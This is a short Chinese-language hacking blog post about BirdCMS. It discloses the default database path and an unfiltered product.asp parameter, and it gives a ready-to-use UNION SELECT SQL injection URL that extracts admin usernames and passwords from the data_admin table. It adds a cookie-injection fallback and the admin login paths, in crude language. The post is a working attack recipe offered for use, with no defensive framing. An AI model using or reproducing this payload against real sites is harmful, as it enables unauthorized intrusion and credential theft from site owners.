作者:fengzi199171 | 来源:互联网 | 2017-11-11 13:41
BirdCMS管理系统,记得1.1爆了万能密码的漏洞!不知道最新版本的有什么洞子没有!大致的下了套源码看了看,网站管理和程序员都懒了!默认数据库data\data#bird$.mdb漏洞文件product.asp貌似都没有任何防注入的,张开双腿等人日啊!表段data_admin
Bird CMS管理系统,记得1.1爆了万能密码的漏洞!不知道最新版本的有什么洞子没有!大致的下了套源码看了看,网站管理和程序员都懒了!
//默认数据库 data\data#bird$.mdb
//漏洞文件 product.asp 貌似都没有任何防注入的,张开双腿等人日啊!
//表段data_admin
构造语句:
product.asp?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20data_admin
字段为name和pwd 如果防注入了就COOKIEs注射一下!
后台admin 或 Bird
From H4ckx7's Blog